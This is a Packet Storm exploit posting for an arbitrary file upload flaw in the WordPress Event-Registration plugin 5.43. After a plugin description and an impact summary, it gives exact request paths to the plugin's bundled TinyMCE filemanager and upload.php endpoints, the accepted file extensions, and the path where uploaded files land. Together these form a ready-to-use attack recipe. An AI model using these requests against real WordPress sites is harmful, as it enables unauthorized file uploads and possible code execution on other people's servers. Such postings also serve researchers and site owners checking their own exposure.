what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Event-Registration 5.43 Arbitrary File Upload

WordPress Event-Registration 5.43 Arbitrary File Upload
Posted Mar 30, 2020
Authored by KingSkrupellos

WordPress Event-Registration plugin version 5.43 suffers from an arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
SHA-256 | 2029bbf836e7de4bb57eb88c7f5f10198718d2552a017080a1b57d33050ff81d

WordPress Event-Registration 5.43 Arbitrary File Upload

Change Mirror Download
####################################################################

# Exploit Title : WordPress Event-Registration Plugins 5.43 Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/03/2020
# Vendor Homepage : wp-event-organiser.com
# Software Links : captainform.com/wordpress-event-registration-plugin/
wordpress.org/plugins/registrations-for-the-events-calendar/
edgetechweb.com
eventregistrationpro.com
# Software Version :
Requires at least: 2.0.2
Tested up to: 3.0.2
Software Affected Version : 5.42 - 5.43
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
This plugin is designed to allow you to take online registrations for events and classes.
Supports Paypal, Google Pay, MonsterPay or Authorize.net online payment sites for online collection of event fees.
This wordpress plugin is designed to run on a Wordpress website and provide registration events, classes, or parties.
It allows you to capture the registering persons contact information and any additional infromation
you request to a database and provides an association to an events database.
It provides the ability to send the register to either a Paypal, Google Pay, Monster Pay,
or Authorize.net online payment site for online collection of event fees.
Additionally it allows support for checks and cash payments.
Optional Captcha field on registration form.
Detailed payment management system to track and record event payments.
Reporting features provide a export list(s) of events, attendees, payments in excel or csv.
Events can be created in an Excel spreadsheet and uploaded via the event upload tool.
Dashboard widget allows for quick reference to events from the dashboard.
Inline menu navigation allows for ease of use.

== Installation ==

1. After unzipping, upload everything in the `Events Registration`
folder to your `/wp-content/plugins/` directory (preserving directory structure).
2. Activate the plugin through the 'Plugins' menu in WordPress.
3. Go to the Event Registration Menu and Configure Organization and enter your company info -
note you will need a paypal id if you plan on accepting paypal payments
4. Go to the Event Setup and create a new event, make sure you select 'make active'.
5. Create a new page (not post) on your site. Put `{EVENTREGIS}` in it on a line by itself.
6. Note: if you are upgradings from a previous version please backup your data prior to upgrade.

####################################################################

# Impact :
***********
WordPress Event-Registration Plugins 5.43 is prone to a vulnerability that lets attackers
upload arbitrary files because it fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/Select%20file&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/upload.php?path=/home/[DIRECTORY-NAME-HERE]/public_html/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files

Valid extensions: gif, jpg, htm, html, pdf, zip
Max upload size: 10 MB

Directory File Path :
**********************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/[YOURFILENAME].html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close